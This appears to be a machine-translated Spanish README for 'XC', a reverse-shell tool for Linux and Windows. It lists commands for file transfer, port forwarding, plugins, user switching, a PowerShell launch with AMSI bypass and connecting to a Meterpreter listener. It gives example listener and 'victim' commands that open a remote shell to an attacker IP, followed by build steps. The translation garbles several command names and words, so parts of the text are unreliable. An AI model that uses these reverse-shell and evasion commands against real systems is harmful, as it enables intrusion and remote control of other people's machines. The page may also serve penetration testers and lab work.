XC es un shell inverso similar a Netcat para Linux y Windows.
característica
ventanas
uso:
└ Comando Compartir: !salir
!Subir
- subir archivo al destino
!descargar - Descargar archivo de destino
!lfwd - Reenvío de puerto local (como ssh -L)
!rfwd - Reenvío de puerto remoto (como ssh -R)
!lsfwd - Lista de huelguistas activos
!rmfwd - Eliminar adelante por índice
!enchufar - Lista de complementos disponibles
!insertar - Ejecutar el complemento
!Aparecer - Genere otro cliente en el puerto especificado
!cáscara - ejecutar /bin/sh
!habla - reiniciar xc con el usuario especificado
!reunirse - Conéctese al oyente x64/meterpreter/reverse_tcp └ Comando específico del sistema operativo: !powershell
- Inicie powershell con AMSI Bypass
!rc - conéctese a un shell de enlace local y reinicie este cliente a través de él
!runasps - Reinicie xc con el usuario especificado usando powershell
!vulnerabilidad - Comprobar vulnerabilidades comunes
- Inicie powershell con AMSI Bypass
linux
uso:
└ Comando Compartir: !salir
!Subir
- subir archivo al objetivo
!descargar - Descargar archivo de destino
!lfwd - Reenvío de puerto local (como ssh -L)
!rfwd - Reenvío de puerto remoto (como ssh -R)
!lsfwd - Lista de huelguistas activos
!rmfwd - Eliminar adelante por índice
!enchufar - Lista de complementos disponibles
!insertar - Ejecutar el complemento
!Aparecer - Genere otro cliente en el puerto especificado
!cáscara - ejecutar /bin/sh
!habla - reiniciar xc con el usuario especificado
!reunirse - Conéctese al oyente x64/meterpreter/reverse_tcp
└ Comandos específicos del sistema operativo:
!ssh - Inicie sshd con la clave configurada en el puerto especificado
ejemplo
- Atacante de Linux:
rlwrap xc -l -p 1337
(servidor) - Víctimas de Windows:
xc.exe 10.10.14.4 1337
(cliente) - Sin parámetros:
xc_10.10.14.4_1337.exe
(cliente)
configurar
Asegúrese de estar ejecutando la versión 1.15+ de golang, las versiones anteriores no se compilarán. Probé en ubuntu: go version go1.16.2 linux/amd64
y Cali go version go1.15.9 linux/amd64
clon de git –recurse-submódulos https://github.com/xct/xc.git
GO111MODULE=off para obtener golang.org/x/sys/…
GO111MODULE=off para obtener golang.org/x/text/encoding/unicode
GO111MODULE=off para obtener github.com/hashicorp/yamux
sudo apt-get install rlwrap upx
linux
python3 build.py